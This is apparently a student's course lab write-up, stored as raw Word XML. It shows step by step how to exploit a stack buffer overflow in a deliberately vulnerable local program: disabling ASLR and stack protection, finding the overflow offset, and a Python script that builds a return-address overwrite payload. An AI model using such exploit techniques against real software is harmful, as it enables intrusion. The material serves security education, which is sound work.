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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 : </w:t>
      </w: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In VM/WSL, you can disable ASLR to make memory addresses predictable, which is important for your buffer overflow exploit. Run this command in your Linux/Unix terminal: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Command : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto" w:cs="Roboto"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>sudo sysctl -w kernel.randomize_va_space=0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Step 2 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Compile the Vulnerable Program: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Ensure you have the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>vuln_program.c</w:t>
      </w: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 source code in your WSL environment. Compile it using the </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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provided gcc command.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Command : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto" w:cs="Roboto"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>gcc ./vuln_program.c -fno-stack-protector -z execstack -static -o vuln_program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Step 3 :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Find the Input Length to Crash the Program: You need to determine the length of input that will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crash the program. This involves providing input larger than the buffer size (128 bytes) to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overwrite the return address on the stack. You can try different input lengths to find the exact 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length that causes a crash. Start with a length longer than 128 bytes. For example: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Command : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto" w:cs="Roboto"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>python3 -c 'print("A" * 200)' | ./vuln_program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[In my case it is 136 bytes]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Step 4 :Write a python script to create an attacking string of bytes where the buffer overflows . </w:t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br w:type="textWrapping"/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My script : </w:t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br w:type="textWrapping"/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import sys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if len(sys.argv) != 2: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 xml:space="preserve">    print("Usage: python3 exploit.py &lt;target_function_address&gt;")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 xml:space="preserve">    sys.exit(1)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# Address of the target function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# Convert the address from hexadecimal to little-endian format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target_address = int(sys.argv[1], 16)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little_endian_address = target_address.to_bytes(4, byteorder='little')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# Buffer size plus saved EBP (136 bytes total)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buffer_size = 136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# Construct the attack string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# 'A' * buffer_size to fill the buffer and EBP, then the target address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attack = b'A' * buffer_size + little_endian_address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# Write the attack string to a file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with open('attack.input', 'wb') as f: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 xml:space="preserve">    f.write(attack)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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto" w:cs="Roboto"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="B7B7B7"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>print(f'Attack string written to attack.input')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shd w:val="clear" w:fill="B7B7B7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Get the python file submitted on bright space  and save it as exploit.py .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Step 5 :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Correct Address of  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>target()</w:t>
      </w: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 Function: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Ensure that you have the correct memory address of the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>target()</w:t>
      </w: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 function. Use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>objdump</w:t>
      </w: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 or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w: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 to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find the exact address:</w:t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br w:type="textWrapping"/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Command : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto" w:cs="Roboto"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>objdump -D vuln_program | grep target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Step 6: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Run the script by providing the address of the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>target()</w:t>
      </w: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 function as an argument. For example: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 xml:space="preserve"> Command :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto" w:cs="Roboto"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> python3 exploit.py 000000000040182d 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Replace </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto" w:cs="Roboto"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">000000000040182d </w:t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with the actual address of the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>target()</w:t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 function in your machine .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  <w:highlight w:val="yellow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Step 7 : This will generate a file named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>attack.input</w:t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 that contains the attack string. You can then use this file to exploit the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>vuln_program</w:t>
      </w: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 by running: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Command : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto" w:cs="Roboto"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>./vuln_program &lt; attack.input</w:t>
      </w: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</w:p>
    <w:p>
      <w:pPr>
        <w:ind w:hanging="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto" w:cs="Roboto"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:hanging="108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 xml:space="preserve">Output : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="6529070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>
      <w:pPr>
        <w:ind w:hanging="1080"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>We get the desired output  i.e “I am sorry that you just got pwned!”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:hanging="1080"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:hanging="1080"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>That completes the project objective successfully .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:hanging="1080"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:hanging="1080"/>
      </w:pP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5E7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2024-04-10T17:10:08Z</dcterms:created>
  <dc:creator>prati</dc:creator>
  <cp:lastModifiedBy>Pratiklalit Veera</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-10T17:13:48Z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DC5D5764379240A29F0E10A9E2D030BB_13</vt:lpwstr>
  </property>
</Properties>
</file>